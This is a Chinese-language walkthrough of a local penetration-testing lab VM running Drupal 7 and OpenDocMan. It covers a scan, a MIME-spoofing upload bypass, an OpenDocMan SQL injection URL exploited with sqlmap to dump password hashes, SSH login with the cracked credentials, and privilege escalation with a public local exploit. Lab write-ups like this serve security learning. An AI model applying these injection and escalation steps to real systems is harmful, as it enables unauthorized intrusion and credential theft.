# 环境搭建
下载下来是 VritualBox 的机器,但是我喜欢用 VM,因为好用。
所以需要做一个转换,教程: https://blog.csdn.net/qq_30054403/article/details/123451969
NAT 模式,IP 地址: 192.168.174.129
# 渗透过程
# 信息初收集
开放端口:
22/tcp open ssh | |
80/tcp open http | |
6667/tcp open irc |
[01:36:02] 301 - 325B - /jabc/includes -> http://192.168.174.129/jabc/includes/ | |
[01:36:03] 200 - 1KB - /jabc/includes/ | |
[01:36:04] 404 - 8KB - /jabc/index.php/login/ | |
[01:36:05] 200 - 117KB - /jabc/includes/bootstrap.inc | |
[01:36:05] 200 - 1KB - /jabc/install.php | |
[01:36:05] 200 - 1KB - /jabc/install.php?profile=default | |
[01:36:12] 301 - 321B - /jabc/misc -> http://192.168.174.129/jabc/misc/ | |
[01:36:13] 301 - 324B - /jabc/modules -> http://192.168.174.129/jabc/modules/ | |
[01:36:13] 200 - 853B - /jabc/modules/ | |
[01:36:23] 200 - 278B - /jabc/profiles/testing/testing.info | |
[01:36:23] 301 - 325B - /jabc/profiles -> http://192.168.174.129/jabc/profiles/ | |
[01:36:23] 200 - 743B - /jabc/profiles/standard/standard.info | |
[01:36:23] 200 - 271B - /jabc/profiles/minimal/minimal.info | |
[01:36:26] 200 - 649B - /jabc/robots.txt | |
[01:36:26] 301 - 324B - /jabc/scripts -> http://192.168.174.129/jabc/scripts/ | |
[01:36:26] 200 - 461B - /jabc/scripts/ | |
[01:36:30] 301 - 322B - /jabc/sites -> http://192.168.174.129/jabc/sites/ | |
[01:36:38] 301 - 326B - /jabc/templates -> http://192.168.174.129/jabc/templates/ | |
[01:36:38] 200 - 471B - /jabc/templates/ | |
[01:36:40] 301 - 323B - /jabc/themes -> http://192.168.174.129/jabc/themes/ | |
[01:36:40] 200 - 535B - /jabc/themes/ | |
[01:36:43] 403 - 4KB - /jabc/update.php | |
[01:36:55] 200 - 42B - /jabc/xmlrpc.php |
User-agent: * | |
Crawl-delay: 10 | |
# Directories | |
Disallow: /includes/ | |
Disallow: /misc/ | |
Disallow: /modules/ | |
Disallow: /profiles/ | |
Disallow: /scripts/ | |
Disallow: /themes/ | |
# Files | |
Disallow: /CHANGELOG.txt | |
Disallow: /cron.php | |
Disallow: /INSTALL.mysql.txt | |
Disallow: /INSTALL.pgsql.txt | |
Disallow: /INSTALL.sqlite.txt | |
Disallow: /install.php | |
Disallow: /INSTALL.txt | |
Disallow: /LICENSE.txt | |
Disallow: /MAINTAINERS.txt | |
Disallow: /update.php | |
Disallow: /UPGRADE.txt | |
Disallow: /xmlrpc.php | |
# Paths (clean URLs) | |
Disallow: /admin/ | |
Disallow: /comment/reply/ | |
Disallow: /filter/tips/ | |
Disallow: /node/add/ | |
Disallow: /search/ | |
Disallow: /user/register/ | |
Disallow: /user/password/ | |
Disallow: /user/login/ | |
Disallow: /user/logout/ | |
# Paths (no clean URLs) | |
Disallow: /?q=admin/ | |
Disallow: /?q=comment/reply/ | |
Disallow: /?q=filter/tips/ | |
Disallow: /?q=node/add/ | |
Disallow: /?q=search/ | |
Disallow: /?q=user/password/ | |
Disallow: /?q=user/register/ | |
Disallow: /?q=user/login/ | |
Disallow: /?q=user/logout/ |
http://192.168.174.129/jabc/ [200 OK] Apache[2.4.7], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.174.129], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.14], Script[text/javascript], Title[JABC | Just Another Bioware Company], UncommonHeaders[x-generator], X-Powered-By[PHP/5.5.9-1ubuntu4.14] |
翻了翻页面,看到有一个黑色文字提示,喊去 /jabcd0cs/ 目录,账号为 guest/guest
# 文件上传(卒
进去看了一眼有个上传点,上传看看,过滤了文件类型
尝试绕过,修改 MIME 为 PNG 发现还是无法绕过,修改 MIME 为 GIF 并添加文件头发现上传成功!于是,寻找按照 PHP 解析的点,没有发现。G
# CMS 漏洞
Drupal 7 的漏洞很多而且很细,利用了两个没有结果
OpenDocMan v1.2.7 搜了一下是有漏洞的,是 sql 注入漏洞: searchsploit -m 32075.txt 。注入点: http://192.168.174.129/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user*
使用 sqlmap 去脱裤,一定要加 --level 5 ,把等级调上去!
拿到了账号密码:
+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+ | |
| id | Email | phone | password | username | last_name | department | first_name | pw_reset_code | | |
+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+ | |
| 1 | [email protected] | 5555551212 | b78aae356709f8c31118ea613980954b | webmin | min | 2 | web | <blank> | | |
| 2 | [email protected] | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 | guest | guest | 2 | guest | NULL | | |
+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+ |
查询一下 hash 值得到账号密码: webmin/webmin1980 ,那么这个时候就有了一个常用的账号密码,我们尝试 ssh 上去看看,发现可以登录
# 提权
拿到了 webmin 的 shell,就尝试进行提权,没有 sudo 权限
看到本地文件夹下有一个 post 的压缩包,看别人文章说是 hydra,用来爆破本地数据库,然后在提权 ==、
那不走远了么,直接搜提权漏洞,编译上去提权就 OK 了家人
┌──(root㉿kali)-[~] | |
└─# searchsploit -m 37292.c |
提权完事
# 小结
思路不够清楚,在 CMS 上磨蹭的时间太久,信息利用率太低。不能高效发现漏洞
提权脚本的使用≈0,就一个个乱试,需要对这个问题有深入理解才行。
